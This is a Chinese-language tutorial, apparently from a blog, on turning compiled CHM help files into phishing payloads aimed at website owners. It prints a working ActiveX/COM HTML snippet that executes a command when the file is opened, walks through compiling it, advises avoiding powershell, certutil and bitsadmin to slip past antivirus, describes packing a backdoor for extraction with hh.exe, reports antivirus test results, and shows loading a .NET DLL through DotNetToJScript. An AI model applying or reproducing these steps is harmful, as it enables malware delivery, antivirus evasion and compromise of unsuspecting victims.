stm真实钓鱼攻略(黑客必会的CHM钓鱼操作)
stm真实钓鱼攻略(黑客必会的CHM钓鱼操作)创建一个新的项目,添加文件后进行编译<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>command exec<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name=
1、CHM钓鱼
进行钓鱼选择合适的payload非常重要,使用一些容易让人放松警惕的文件格式可以大大提高钓鱼的成功率。CHM是微软推出的基于HTML的帮助文件系统,被 IE 浏览器支持的JavaSCRIPT VBScript ActiveX 等,CHM同样支持。因此使用CHM作为钓鱼的payload非常合适。
上述的总体意思就是,可以让更多站长上当,这里充分了利用到了社会工程学
1) 、使用com控件命令执行
根据@ithurricanept的推特
使用了js启动com控件执行命令
原始码如下:
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>command exec<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=' calc.exe'> <PARAM name="Item2" value="273 1 1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>
POC
使用HTML帮助研讨会
创建一个新的项目,添加文件后进行编译
选择新
记住这里千万不要打勾
随便输入记住带.hpp后缀
随便选择一个
然后选择new之后选择HTML文件
然后输入我们刚才的poc
写完之后ctrl s保存
记住保存的地址
然后点击这个
选择添加把我们刚写的文件添加进去
然后点击ok
随后点击这个
得到地址去访问。发现便执行了命令
利用实际测试的时候注意了以下几点:
执行命令的时候注意预定的参数与程序名需要用逗号替换,参数与参数之间不需要。
考虑到进行敏感操作会导致杀软提示,因此应避免使用powershell,bitsadmin,certutil,cscript等。
通过cmd执行命令也属于敏感操作,因此使用多个控件依次执行命令。
在搜索的过程中发现.chm文件的替换程序hh.exe具有反编译功能(反编译,将chm返回成html,其实就类似chm可以比喻成一个压缩包,decompile是解压缩)的功能,可以将打包进chm的文件释放出来
HH.EXE -decompile D:/xTemp/decompile-folder C:/xTemp/XMLconvert.chm
hh -decompile目标文件夹源CHM文件名
这句话的意思
因此可以将后门程序一起打包进chm文件中,运行时调用hh.exe释放chm中的后门程序再执行。
测试:
使用360测试的时候效果不太理想,在联网情况下使用hh.exe反编译会被拦截,断网情况下没有问题。
使用火绒测试没有任何拦截。
3、使用js加载.net既然可以利用chm执行js,那为什么不内嵌.net和dll呢?
POC编写一个.net dll
namespace ClassLibrary1{ public class Class1 { public Class1() { /* Start notepad */ Process.Start("notepad.exe"); } }}
生成js脚本
DotNetToJScript.exe -o 1.js ClassLibrary1.dll -c ClassLibrary1.Class1